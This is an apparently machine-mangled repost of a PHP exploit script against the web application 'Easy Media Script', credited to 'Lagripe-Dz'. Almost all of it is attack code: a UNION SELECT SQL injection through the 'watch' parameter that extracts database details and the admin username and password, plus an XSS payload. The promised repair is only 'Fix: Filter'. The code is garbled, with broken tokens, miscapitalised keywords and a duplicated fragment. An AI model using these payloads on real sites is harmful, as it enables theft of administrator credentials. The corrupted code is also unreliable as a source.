Easy Media Script SQL Injection defects and repair

<? Php

If (! $ Argv [1])
Die ("

Usage: php exploit. php [site]
Example: php exploit. php http://site.tld/?path=/

");
Print_r ("

# Tilte ......: [Easy Media Script SQL Injection]
# Author...: [Lagripe-Dz]
# Date ......: [27-o5-2o11]
# Location...: [ALGERIA]
# HoMe ......: [Sec4Ever.com & Lagripe-Dz.org]
# Download ..: [http://easymediascript.com/]
# Gr33tz...: [All Sec4ever Memberz]

-= [ExPloiT] =-

# SQL Inj: http: // site/EMS /? Watch = 1
# XSS: http: // site/EMS /? Go = "> <
ScRiPt> alert (0) </ScRiPt>

-= [Start] =-

");

$ T = array ("db_user" => "user ()", "db_version" => "version ()", "db_name
"=>" Database ()",
"UserName" => "user", "Password" => "pass ");

Foreach ($ t as $ r => $ y ){

"). ", $ Y, 0x ". bin2hex ("<$ r> ")., 25/** // **/fRoM/** // **/ip_admin % 23 "> $ x = @ file_get_contents ($ argv [1]. "? Watch =-1 /**//**//*! UNiOn *//**//**//*! SElEcT */1, group_concat (0x ". bin2hex ("<$ r> "). ", $ y, 0x ". bin2hex ("<$ r> ")., 25/** // **/fRoM/** // **/ip_admin % 23 ");

Preg_match_all ("{<$ r> (.*?) <$ R >} I ", $ x, $ dz );

Echo $ u = ($ dz [1] [0])? "[-] $ R:". $ dz [1] [0]. "": "[-] $ r: Failed
! ";

}
Echo "[-] AdminPanel:". $ argv [1]. "ip-admin/login. php ";

Print_r ("
-= [Finished] =-
");

# END ..!

?>
Fix: Filter